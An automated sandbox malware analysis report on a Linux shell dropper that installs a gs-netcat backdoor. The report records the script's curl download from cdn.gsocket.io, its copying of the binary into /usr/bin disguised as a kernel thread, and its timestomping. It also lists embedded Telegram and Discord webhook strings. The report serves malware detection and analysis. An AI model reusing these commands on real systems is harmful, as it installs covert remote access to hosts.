Loading Joe Sandbox Report ...

Edit tour

Linux Analysis Report
y

Overview

General Information

Sample name:y
Analysis ID:1523256
MD5:b4ae01a2cca1052689c00d8ff4e94524
SHA1:9d8b20bb6bb0471c16dfe8ccadc0a9441bd986ce
SHA256:9cc787ca0b6e698b62f6e8ca5da6f2183a350acda9098b4194aa1894dcd39690
Infos:

Detection

Score:76
Range:0 - 100
Whitelisted:false

Signatures

Antivirus detection for dropped file
Multi AV Scanner detection for submitted file
Drops files in suspicious directories
Explicitly modifies time stamps using the "touch" command
Sample deletes itself
Writes ELF files to hidden directories
Writes identical ELF files to multiple locations
Changes permissions of common UNIX (system) binary directories
Creates hidden files and/or directories
Creates hidden files without content (potentially used as a mutex)
Enumerates processes within the "proc" file system
Executes commands using a shell command-line interpreter
Executes the "base64" command used to encode or decode data (e.g. files, payloads)
Executes the "chmod" command used to modify permissions
Executes the "curl" command used to transfer data via the network (typically using HTTP/S)
Executes the "mkdir" command used to create folders
Executes the "pgrep" command search for and/or send signals to processes
Executes the "rm" command used to delete files or directories
Executes the "touch" command used to create files or modify time stamps
Executes the "uname" command used to read OS and architecture name
Found strings indicative of a multi-platform dropper
Reads CPU information from /sys indicative of miner or evasive malware
Reads the 'hosts' file potentially containing internal network hosts
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Sample tries to set the executable flag
Uses the "uname" system call to query kernel version information (possible evasion)
Writes ELF files to disk

Classification

Joe Sandbox version:41.0.0 Charoite
Analysis ID:1523256
Start date and time:2024-10-01 11:11:13 +02:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 4m 52s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample name:y
Detection:MAL
Classification:mal76.evad.lin@0/2@3/0
  • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Command:bash "/tmp/y"
PID:6238
Exit Code:255
Exit Code Info:
Killed:False
Standard Output:
--> Trying x86_64-alpine
Downloading binaries........................................................[OK]
Unpacking binaries..........................................................[OK]
Copying binaries............................................................[OK]
Testing binaries............................................................[OK]
Testing Global Socket Relay Network.....................................[FAILED]
Standard Error:6rsH23UmaTAi7m394AzqDd ef08a07c25a8a27409fc11a10d3d1c21 NET-ERROR
Cannot connect to GSRN. Firewalled? Try GS_PORT=53 or 22, 7350 or 67.
  • system is lnxubuntu20
  • bash (PID: 6238, Parent: 6162, MD5: 7063c3930affe123baecd3b340f1ad2c) Arguments: /usr/bin/bash /tmp/y
    • bash New Fork (PID: 6239, Parent: 6238)
      • bash New Fork (PID: 6240, Parent: 6239)
      • bash New Fork (PID: 6241, Parent: 6239)
      • sed (PID: 6241, Parent: 6239, MD5: 885062561f66aa1d4af4c54b9e7cc81a) Arguments: sed s/[^a-zA-Z0-9]/\\\\&/g
    • bash New Fork (PID: 6242, Parent: 6238)
      • bash New Fork (PID: 6243, Parent: 6242)
      • bash New Fork (PID: 6244, Parent: 6242)
      • sed (PID: 6244, Parent: 6242, MD5: 885062561f66aa1d4af4c54b9e7cc81a) Arguments: sed s/[^a-zA-Z0-9]/\\\\&/g
    • bash New Fork (PID: 6245, Parent: 6238)
      • bash New Fork (PID: 6246, Parent: 6245)
      • bash New Fork (PID: 6247, Parent: 6245)
      • sed (PID: 6247, Parent: 6245, MD5: 885062561f66aa1d4af4c54b9e7cc81a) Arguments: sed s/[^a-zA-Z0-9]/\\\\&/g
    • bash New Fork (PID: 6248, Parent: 6238)
      • bash New Fork (PID: 6249, Parent: 6248)
      • bash New Fork (PID: 6250, Parent: 6248)
      • sed (PID: 6250, Parent: 6248, MD5: 885062561f66aa1d4af4c54b9e7cc81a) Arguments: sed s/[^a-zA-Z0-9]/\\\\&/g
    • bash New Fork (PID: 6251, Parent: 6238)
      • bash New Fork (PID: 6252, Parent: 6251)
      • bash New Fork (PID: 6253, Parent: 6251)
      • sed (PID: 6253, Parent: 6251, MD5: 885062561f66aa1d4af4c54b9e7cc81a) Arguments: sed s/[^a-zA-Z0-9]/\\\\&/g
    • bash New Fork (PID: 6254, Parent: 6238)
      • bash New Fork (PID: 6255, Parent: 6254)
      • bash New Fork (PID: 6256, Parent: 6254)
      • sed (PID: 6256, Parent: 6254, MD5: 885062561f66aa1d4af4c54b9e7cc81a) Arguments: sed s/[^a-zA-Z0-9]/\\\\&/g
    • bash New Fork (PID: 6257, Parent: 6238)
      • bash New Fork (PID: 6258, Parent: 6257)
      • bash New Fork (PID: 6259, Parent: 6257)
      • sed (PID: 6259, Parent: 6257, MD5: 885062561f66aa1d4af4c54b9e7cc81a) Arguments: sed s/[^a-zA-Z0-9]/\\\\&/g
    • bash New Fork (PID: 6260, Parent: 6238)
      • bash New Fork (PID: 6261, Parent: 6260)
      • bash New Fork (PID: 6262, Parent: 6260)
      • sed (PID: 6262, Parent: 6260, MD5: 885062561f66aa1d4af4c54b9e7cc81a) Arguments: sed s/[^a-zA-Z0-9]/\\\\&/g
    • bash New Fork (PID: 6263, Parent: 6238)
      • bash New Fork (PID: 6264, Parent: 6263)
      • bash New Fork (PID: 6265, Parent: 6263)
      • sed (PID: 6265, Parent: 6263, MD5: 885062561f66aa1d4af4c54b9e7cc81a) Arguments: sed s/[^a-zA-Z0-9]/\\\\&/g
    • bash New Fork (PID: 6266, Parent: 6238)
      • bash New Fork (PID: 6267, Parent: 6266)
      • bash New Fork (PID: 6268, Parent: 6266)
      • sed (PID: 6268, Parent: 6266, MD5: 885062561f66aa1d4af4c54b9e7cc81a) Arguments: sed s/[^a-zA-Z0-9]/\\\\&/g
    • bash New Fork (PID: 6269, Parent: 6238)
      • bash New Fork (PID: 6270, Parent: 6269)
      • bash New Fork (PID: 6271, Parent: 6269)
      • sed (PID: 6271, Parent: 6269, MD5: 885062561f66aa1d4af4c54b9e7cc81a) Arguments: sed s/[^a-zA-Z0-9]/\\\\&/g
    • bash New Fork (PID: 6272, Parent: 6238)
      • bash New Fork (PID: 6273, Parent: 6272)
      • bash New Fork (PID: 6274, Parent: 6272)
      • sed (PID: 6274, Parent: 6272, MD5: 885062561f66aa1d4af4c54b9e7cc81a) Arguments: sed s/[^a-zA-Z0-9]/\\\\&/g
    • bash New Fork (PID: 6277, Parent: 6238)
    • uname (PID: 6277, Parent: 6238, MD5: 4ac7c634c5bec95753c480e9d421dcc2) Arguments: uname -m
    • bash New Fork (PID: 6278, Parent: 6238)
      • bash New Fork (PID: 6279, Parent: 6278)
      • bash New Fork (PID: 6280, Parent: 6278)
      • base64 (PID: 6280, Parent: 6278, MD5: 81ddf3d1d8e681d22921836b9360405f) Arguments: base64 -w0
      • bash New Fork (PID: 6281, Parent: 6278)
      • base64 (PID: 6281, Parent: 6278, MD5: 81ddf3d1d8e681d22921836b9360405f) Arguments: base64 -d
    • bash New Fork (PID: 6282, Parent: 6238)
    • bash New Fork (PID: 6283, Parent: 6238)
      • bash New Fork (PID: 6284, Parent: 6283)
      • bash New Fork (PID: 6285, Parent: 6283)
      • sed (PID: 6285, Parent: 6283, MD5: 885062561f66aa1d4af4c54b9e7cc81a) Arguments: sed s/[^a-zA-Z0-9]/\\\\&/g
    • bash New Fork (PID: 6286, Parent: 6238)
      • bash New Fork (PID: 6287, Parent: 6286)
      • pgrep (PID: 6287, Parent: 6286, MD5: fa96a75a08109d8842e4865b2907d51f) Arguments: pgrep defunct
    • bash New Fork (PID: 6288, Parent: 6238)
      • bash New Fork (PID: 6289, Parent: 6288)
      • pgrep (PID: 6289, Parent: 6288, MD5: fa96a75a08109d8842e4865b2907d51f) Arguments: pgrep (\\[kstrp\\]|\\[watchdogd\\]|\\[ksmd\\]|\\[kswapd0\\]|\\[card0\\-crtc8\\]|\\[mm\\_percpu\\_wq\\]|\\[rcu\\_preempt\\]|\\[kworker\\]|\\[raid5wq\\]|\\[slub\\_flushwq\\]|\\[netns\\]|\\[kaluad\\])
    • bash New Fork (PID: 6290, Parent: 6238)
      • bash New Fork (PID: 6291, Parent: 6290)
      • bash (PID: 6291, Parent: 6290, MD5: 7063c3930affe123baecd3b340f1ad2c) Arguments: /bin/bash -c "echo TRUE"
    • bash New Fork (PID: 6292, Parent: 6238)
    • dirname (PID: 6292, Parent: 6238, MD5: aafc5c13efcc5fc5b28b2cce6547765a) Arguments: dirname /dev/shm/.gs-0
    • bash New Fork (PID: 6293, Parent: 6238)
    • dirname (PID: 6293, Parent: 6238, MD5: aafc5c13efcc5fc5b28b2cce6547765a) Arguments: dirname /dev/shm
    • bash New Fork (PID: 6294, Parent: 6238)
      • bash New Fork (PID: 6295, Parent: 6294)
      • date (PID: 6295, Parent: 6294, MD5: b3d4bbb2fce7ba842e2ea0786997ca0d) Arguments: date -r /dev/shm +%Y%m%d%H%M.%S
    • bash New Fork (PID: 6296, Parent: 6238)
    • dirname (PID: 6296, Parent: 6238, MD5: aafc5c13efcc5fc5b28b2cce6547765a) Arguments: dirname /dev/shm/.gs-0
    • bash New Fork (PID: 6297, Parent: 6238)
      • bash New Fork (PID: 6298, Parent: 6297)
      • ls (PID: 6298, Parent: 6297, MD5: e7793f15c2ff7e747b4bc7079f5cd4f7) Arguments: ls -atr /dev/shm
      • bash New Fork (PID: 6299, Parent: 6297)
      • head (PID: 6299, Parent: 6297, MD5: fd96a67145172477dd57131396fc9608) Arguments: head -n1
    • bash New Fork (PID: 6300, Parent: 6238)
      • bash New Fork (PID: 6301, Parent: 6300)
      • date (PID: 6301, Parent: 6300, MD5: b3d4bbb2fce7ba842e2ea0786997ca0d) Arguments: date -r /dev/shm/.. +%Y%m%d%H%M.%S
    • bash New Fork (PID: 6302, Parent: 6238)
    • mkdir (PID: 6302, Parent: 6238, MD5: 088c9d1df5a28ed16c726eca15964cb7) Arguments: mkdir /dev/shm/.gs-0
    • bash New Fork (PID: 6303, Parent: 6238)
    • chmod (PID: 6303, Parent: 6238, MD5: 739483b900c045ae1374d6f53a86a279) Arguments: chmod 700 /dev/shm/.gs-0
    • bash New Fork (PID: 6304, Parent: 6238)
    • bash New Fork (PID: 6305, Parent: 6238)
    • touch (PID: 6305, Parent: 6238, MD5: 3859c173f5d3b37be3e531b7c84a9c68) Arguments: touch /dev/shm/.gs-0/.gs-rw.lock
    • bash New Fork (PID: 6306, Parent: 6238)
    • rm (PID: 6306, Parent: 6238, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -f /dev/shm/.gs-0/.gs-rw.lock
    • bash New Fork (PID: 6307, Parent: 6238)
    • dirname (PID: 6307, Parent: 6238, MD5: aafc5c13efcc5fc5b28b2cce6547765a) Arguments: dirname /usr/bin/defunct
    • bash New Fork (PID: 6308, Parent: 6238)
    • dirname (PID: 6308, Parent: 6238, MD5: aafc5c13efcc5fc5b28b2cce6547765a) Arguments: dirname /usr/bin
    • bash New Fork (PID: 6309, Parent: 6238)
      • bash New Fork (PID: 6310, Parent: 6309)
      • date (PID: 6310, Parent: 6309, MD5: b3d4bbb2fce7ba842e2ea0786997ca0d) Arguments: date -r /usr/bin +%Y%m%d%H%M.%S
    • bash New Fork (PID: 6311, Parent: 6238)
    • dirname (PID: 6311, Parent: 6238, MD5: aafc5c13efcc5fc5b28b2cce6547765a) Arguments: dirname /usr/bin/defunct
    • bash New Fork (PID: 6312, Parent: 6238)
      • bash New Fork (PID: 6313, Parent: 6312)
      • ls (PID: 6313, Parent: 6312, MD5: e7793f15c2ff7e747b4bc7079f5cd4f7) Arguments: ls -atr /usr/bin
      • bash New Fork (PID: 6314, Parent: 6312)
      • head (PID: 6314, Parent: 6312, MD5: fd96a67145172477dd57131396fc9608) Arguments: head -n1
    • bash New Fork (PID: 6315, Parent: 6238)
      • bash New Fork (PID: 6316, Parent: 6315)
      • date (PID: 6316, Parent: 6315, MD5: b3d4bbb2fce7ba842e2ea0786997ca0d) Arguments: date -r /usr/bin/dirsplit +%Y%m%d%H%M.%S
    • bash New Fork (PID: 6317, Parent: 6238)
    • touch (PID: 6317, Parent: 6238, MD5: 3859c173f5d3b37be3e531b7c84a9c68) Arguments: touch /usr/bin/defunct
    • bash New Fork (PID: 6318, Parent: 6238)
    • chmod (PID: 6318, Parent: 6238, MD5: 739483b900c045ae1374d6f53a86a279) Arguments: chmod 600 /usr/bin/defunct
    • bash New Fork (PID: 6319, Parent: 6238)
    • bash New Fork (PID: 6320, Parent: 6238)
    • basename (PID: 6320, Parent: 6238, MD5: 3283660e59f128df18bec9b96fbd4d41) Arguments: basename /bin/true
    • bash New Fork (PID: 6321, Parent: 6238)
    • dirname (PID: 6321, Parent: 6238, MD5: aafc5c13efcc5fc5b28b2cce6547765a) Arguments: dirname /usr/bin/defunct
    • bash New Fork (PID: 6322, Parent: 6238)
    • bash New Fork (PID: 6323, Parent: 6238)
    • bash New Fork (PID: 6324, Parent: 6238)
      • bash New Fork (PID: 6325, Parent: 6324)
        • bash New Fork (PID: 6326, Parent: 6325)
        • bash New Fork (PID: 6327, Parent: 6325)
        • base64 (PID: 6327, Parent: 6325, MD5: 81ddf3d1d8e681d22921836b9360405f) Arguments: base64 -w0
    • bash New Fork (PID: 6328, Parent: 6238)
      • bash New Fork (PID: 6329, Parent: 6328)
        • bash New Fork (PID: 6330, Parent: 6329)
        • bash New Fork (PID: 6331, Parent: 6329)
        • base64 (PID: 6331, Parent: 6329, MD5: 81ddf3d1d8e681d22921836b9360405f) Arguments: base64 -w0
    • bash New Fork (PID: 6332, Parent: 6238)
      • bash New Fork (PID: 6333, Parent: 6332)
        • bash New Fork (PID: 6334, Parent: 6333)
        • bash New Fork (PID: 6335, Parent: 6333)
        • base64 (PID: 6335, Parent: 6333, MD5: 81ddf3d1d8e681d22921836b9360405f) Arguments: base64 -w0
    • bash New Fork (PID: 6336, Parent: 6238)
      • bash New Fork (PID: 6337, Parent: 6336)
      • curl (PID: 6337, Parent: 6336, MD5: add6bc2195e82c55985ccf49fd4048e6) Arguments: curl -fsSL --connect-timeout 7 -m900 --retry 3 https://cdn.gsocket.io/bin/gs-netcat_mini-linux-x86_64 --output /dev/shm/.gs-0/gs-netcat_mini-linux-x86_64
    • bash New Fork (PID: 6341, Parent: 6238)
    • mv (PID: 6341, Parent: 6238, MD5: 504f0590fa482d4da070a702260e3716) Arguments: mv /dev/shm/.gs-0/gs-netcat_mini-linux-x86_64 /dev/shm/.gs-0/gs-netcat
    • bash New Fork (PID: 6342, Parent: 6238)
    • dirname (PID: 6342, Parent: 6238, MD5: aafc5c13efcc5fc5b28b2cce6547765a) Arguments: dirname /usr/bin/defunct
    • bash New Fork (PID: 6343, Parent: 6238)
    • rm (PID: 6343, Parent: 6238, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -f /usr/bin/defunct
    • bash New Fork (PID: 6344, Parent: 6238)
    • dirname (PID: 6344, Parent: 6238, MD5: aafc5c13efcc5fc5b28b2cce6547765a) Arguments: dirname /usr/bin/defunct
    • bash New Fork (PID: 6345, Parent: 6238)
    • touch (PID: 6345, Parent: 6238, MD5: 3859c173f5d3b37be3e531b7c84a9c68) Arguments: touch /usr/bin/defunct
    • bash New Fork (PID: 6346, Parent: 6238)
    • chmod (PID: 6346, Parent: 6238, MD5: 739483b900c045ae1374d6f53a86a279) Arguments: chmod 600 /usr/bin/defunct
    • bash New Fork (PID: 6347, Parent: 6238)
    • cp (PID: 6347, Parent: 6238, MD5: 40f10ae7ea3e44218d1a8c306f79c83f) Arguments: cp /dev/shm/.gs-0/gs-netcat /usr/bin/defunct
    • bash New Fork (PID: 6348, Parent: 6238)
    • dirname (PID: 6348, Parent: 6238, MD5: aafc5c13efcc5fc5b28b2cce6547765a) Arguments: dirname /dev/shm/.gs-0/gs-netcat
    • bash New Fork (PID: 6349, Parent: 6238)
    • rm (PID: 6349, Parent: 6238, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -f /dev/shm/.gs-0/gs-netcat
    • bash New Fork (PID: 6350, Parent: 6238)
    • chmod (PID: 6350, Parent: 6238, MD5: 739483b900c045ae1374d6f53a86a279) Arguments: chmod 700 /usr/bin/defunct
    • bash New Fork (PID: 6351, Parent: 6238)
      • bash New Fork (PID: 6352, Parent: 6351)
      • defunct (PID: 6352, Parent: 6351, MD5: d75cb9920d1d3d280518ddccfe4789d2) Arguments: /usr/bin/defunct -g
    • bash New Fork (PID: 6353, Parent: 6238)
    • defunct (PID: 6353, Parent: 6238, MD5: d75cb9920d1d3d280518ddccfe4789d2) Arguments: [slub_flushwq]
    • bash New Fork (PID: 6354, Parent: 6238)
    • rm (PID: 6354, Parent: 6238, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -rf /dev/shm/.gs-0/*
    • bash New Fork (PID: 6355, Parent: 6238)
    • rmdir (PID: 6355, Parent: 6238, MD5: b02774276f8ce17de6458c24b05e6e07) Arguments: rmdir /dev/shm/.gs-0
    • bash New Fork (PID: 6356, Parent: 6238)
    • touch (PID: 6356, Parent: 6238, MD5: 3859c173f5d3b37be3e531b7c84a9c68) Arguments: touch -t 202410010411.39 /dev/shm
    • bash New Fork (PID: 6357, Parent: 6238)
    • touch (PID: 6357, Parent: 6238, MD5: 3859c173f5d3b37be3e531b7c84a9c68) Arguments: touch -t 202109170423.51 /usr/bin
    • bash New Fork (PID: 6358, Parent: 6238)
    • touch (PID: 6358, Parent: 6238, MD5: 3859c173f5d3b37be3e531b7c84a9c68) Arguments: touch -t 200611251713.29 /usr/bin/defunct
  • cleanup
No yara matches
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: /dev/shm/.gs-0/gs-netcat_mini-linux-x86_64Avira: detection malicious, Label: LINUX/AVI.Agent.wrdff
Source: /usr/bin/defunctAvira: detection malicious, Label: LINUX/AVI.Agent.wrdff
Source: yReversingLabs: Detection: 41%
Source: yVirustotal: Detection: 39%Perma Link
Source: /usr/bin/pgrep (PID: 6287)Reads CPU info from /sys: /sys/devices/system/cpu/onlineJump to behavior
Source: /usr/bin/pgrep (PID: 6289)Reads CPU info from /sys: /sys/devices/system/cpu/onlineJump to behavior
Source: yString: # - Command to use for download. =wget or =curl.
Source: yString: # errexit "Need curl or wget."
Source: yString: FAIL_OUT "Need curl or wget. Try ${CM}apt install curl${CN}"
Source: /usr/bin/curl (PID: 6337)Reads hosts file: /etc/hostsJump to behavior
Source: /usr/bin/defunct (PID: 6353)Reads hosts file: /etc/hostsJump to behavior
Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.42
Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.43
Source: unknownTCP traffic detected without corresponding DNS query: 109.202.202.202
Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.42
Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.43
Source: unknownTCP traffic detected without corresponding DNS query: 109.202.202.202
Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.42
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /bin/gs-netcat_mini-linux-x86_64 HTTP/1.1Host: cdn.gsocket.ioUser-Agent: curl/7.68.0Accept: */*
Source: global trafficDNS traffic detected: DNS query: cdn.gsocket.io
Source: global trafficDNS traffic detected: DNS query: c.gs.thc.org
Source: yString found in binary or memory: https://api.telegram.org/bot$
Source: yString found in binary or memory: https://cdn.gsocket.io
Source: yString found in binary or memory: https://discord.com/api/webhooks/$
Source: yString found in binary or memory: https://foo.blah/log.php?s=
Source: yString found in binary or memory: https://github.com/hackerschoice/gsocket-relay
Source: yString found in binary or memory: https://github.com/hackerschoice/gsocket/releases$
Source: yString found in binary or memory: https://gsocket.io
Source: yString found in binary or memory: https://gsocket.io/x)
Source: yString found in binary or memory: https://t.me/thcorg$
Source: yString found in binary or memory: https://webhook.site
Source: yString found in binary or memory: https://webhook.site/$
Source: yString found in binary or memory: https://www.gsocket.io/deploy/
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38076
Source: unknownNetwork traffic detected: HTTP traffic on port 40962 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 38076 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 43928 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 42836 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 40962
Source: Initial sampleString containing 'busybox' found: # Must use same name on busybox-systems
Source: Initial sampleString containing 'busybox' found: # Create empty crontab (busybox) if no crontab exists at all.
Source: classification engineClassification label: mal76.evad.lin@0/2@3/0

Persistence and Installation Behavior

barindex
Source: /usr/bin/bash (PID: 6356)Touch executable uses timestamp modification options: touch -t 202410010411.39 /dev/shmJump to behavior
Source: /usr/bin/bash (PID: 6357)Touch executable uses timestamp modification options: touch -t 202109170423.51 /usr/binJump to behavior
Source: /usr/bin/bash (PID: 6358)Touch executable uses timestamp modification options: touch -t 200611251713.29 /usr/bin/defunctJump to behavior
Source: /usr/bin/curl (PID: 6337)File written to hidden directory: /dev/shm/.gs-0/gs-netcat_mini-linux-x86_64Jump to dropped file
Source: /usr/bin/curl (PID: 6337)File with SHA-256 D94F75A70B5CABAF786AC57177ED841732E62BDCC9A29E06E5B41D9BE567BCFA written: /dev/shm/.gs-0/gs-netcat_mini-linux-x86_64Jump to dropped file
Source: /usr/bin/cp (PID: 6347)File with SHA-256 D94F75A70B5CABAF786AC57177ED841732E62BDCC9A29E06E5B41D9BE567BCFA written: /usr/bin/defunctJump to dropped file
Source: /usr/bin/bash (PID: 6318)Chmod directory: /usr/bin/chmod -> chmod 600 /usr/bin/defunctJump to behavior
Source: /usr/bin/bash (PID: 6346)Chmod directory: /usr/bin/chmod -> chmod 600 /usr/bin/defunctJump to behavior
Source: /usr/bin/bash (PID: 6350)Chmod directory: /usr/bin/chmod -> chmod 700 /usr/bin/defunctJump to behavior
Source: /usr/bin/mkdir (PID: 6302)Directory: /dev/shm/.gs-0Jump to behavior
Source: /usr/bin/touch (PID: 6305)File: /dev/shm/.gs-0/.gs-rw.lockJump to behavior
Source: /usr/bin/curl (PID: 6337)Directory: /root/.curlrcJump to behavior
Source: /usr/bin/touch (PID: 6305)Empty hidden file: /dev/shm/.gs-0/.gs-rw.lockJump to behavior
Source: /usr/bin/pgrep (PID: 6287)File opened: /proc/1582/statusJump to behavior
Source: /usr/bin/pgrep (PID: 6287)File opened: /proc/1582/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 6287)File opened: /proc/3088/statusJump to behavior
Source: /usr/bin/pgrep (PID: 6287)File opened: /proc/3088/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 6287)File opened: /proc/230/statusJump to behavior
Source: /usr/bin/pgrep (PID: 6287)File opened: /proc/230/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 6287)File opened: /proc/110/statusJump to behavior
Source: /usr/bin/pgrep (PID: 6287)File opened: /proc/110/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 6287)File opened: /proc/231/statusJump to behavior
Source: /usr/bin/pgrep (PID: 6287)File opened: /proc/231/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 6287)File opened: /proc/111/statusJump to behavior
Source: /usr/bin/pgrep (PID: 6287)File opened: /proc/111/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 6287)File opened: /proc/232/statusJump to behavior
Source: /usr/bin/pgrep (PID: 6287)File opened: /proc/232/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 6287)File opened: /proc/1579/statusJump to behavior
Source: /usr/bin/pgrep (PID: 6287)File opened: /proc/1579/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 6287)File opened: /proc/112/statusJump to behavior
Source: /usr/bin/pgrep (PID: 6287)File opened: /proc/112/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 6287)File opened: /proc/233/statusJump to behavior
Source: /usr/bin/pgrep (PID: 6287)File opened: /proc/233/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 6287)File opened: /proc/1699/statusJump to behavior
Source: /usr/bin/pgrep (PID: 6287)File opened: /proc/1699/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 6287)File opened: /proc/113/statusJump to behavior
Source: /usr/bin/pgrep (PID: 6287)File opened: /proc/113/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 6287)File opened: /proc/234/statusJump to behavior
Source: /usr/bin/pgrep (PID: 6287)File opened: /proc/234/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 6287)File opened: /proc/1335/statusJump to behavior
Source: /usr/bin/pgrep (PID: 6287)File opened: /proc/1335/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 6287)File opened: /proc/1698/statusJump to behavior
Source: /usr/bin/pgrep (PID: 6287)File opened: /proc/1698/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 6287)File opened: /proc/114/statusJump to behavior
Source: /usr/bin/pgrep (PID: 6287)File opened: /proc/114/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 6287)File opened: /proc/235/statusJump to behavior
Source: /usr/bin/pgrep (PID: 6287)File opened: /proc/235/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 6287)File opened: /proc/1334/statusJump to behavior
Source: /usr/bin/pgrep (PID: 6287)File opened: /proc/1334/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 6287)File opened: /proc/1576/statusJump to behavior
Source: /usr/bin/pgrep (PID: 6287)File opened: /proc/1576/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 6287)File opened: /proc/2302/statusJump to behavior
Source: /usr/bin/pgrep (PID: 6287)File opened: /proc/2302/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 6287)File opened: /proc/115/statusJump to behavior
Source: /usr/bin/pgrep (PID: 6287)File opened: /proc/115/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 6287)File opened: /proc/236/statusJump to behavior
Source: /usr/bin/pgrep (PID: 6287)File opened: /proc/236/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 6287)File opened: /proc/116/statusJump to behavior
Source: /usr/bin/pgrep (PID: 6287)File opened: /proc/116/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 6287)File opened: /proc/237/statusJump to behavior
Source: /usr/bin/pgrep (PID: 6287)File opened: /proc/237/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 6287)File opened: /proc/117/statusJump to behavior
Source: /usr/bin/pgrep (PID: 6287)File opened: /proc/117/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 6287)File opened: /proc/118/statusJump to behavior
Source: /usr/bin/pgrep (PID: 6287)File opened: /proc/118/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 6287)File opened: /proc/910/statusJump to behavior
Source: /usr/bin/pgrep (PID: 6287)File opened: /proc/910/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 6287)File opened: /proc/119/statusJump to behavior
Source: /usr/bin/pgrep (PID: 6287)File opened: /proc/119/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 6287)File opened: /proc/912/statusJump to behavior
Source: /usr/bin/pgrep (PID: 6287)File opened: /proc/912/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 6287)File opened: /proc/10/statusJump to behavior
Source: /usr/bin/pgrep (PID: 6287)File opened: /proc/10/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 6287)File opened: /proc/2307/statusJump to behavior
Source: /usr/bin/pgrep (PID: 6287)File opened: /proc/2307/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 6287)File opened: /proc/11/statusJump to behavior
Source: /usr/bin/pgrep (PID: 6287)File opened: /proc/11/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 6287)File opened: /proc/918/statusJump to behavior
Source: /usr/bin/pgrep (PID: 6287)File opened: /proc/918/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 6287)File opened: /proc/12/statusJump to behavior
Source: /usr/bin/pgrep (PID: 6287)File opened: /proc/12/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 6287)File opened: /proc/13/statusJump to behavior
Source: /usr/bin/pgrep (PID: 6287)File opened: /proc/13/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 6287)File opened: /proc/14/statusJump to behavior
Source: /usr/bin/pgrep (PID: 6287)File opened: /proc/14/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 6287)File opened: /proc/15/statusJump to behavior
Source: /usr/bin/pgrep (PID: 6287)File opened: /proc/15/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 6287)File opened: /proc/16/statusJump to behavior
Source: /usr/bin/pgrep (PID: 6287)File opened: /proc/16/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 6287)File opened: /proc/17/statusJump to behavior
Source: /usr/bin/pgrep (PID: 6287)File opened: /proc/17/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 6287)File opened: /proc/18/statusJump to behavior
Source: /usr/bin/pgrep (PID: 6287)File opened: /proc/18/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 6287)File opened: /proc/1594/statusJump to behavior
Source: /usr/bin/pgrep (PID: 6287)File opened: /proc/1594/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 6287)File opened: /proc/120/statusJump to behavior
Source: /usr/bin/pgrep (PID: 6287)File opened: /proc/120/cmdlineJump to behavior
Source: /usr/bin/pgrep (PID: 6287)File opened: /proc/121/statusJump to behavior
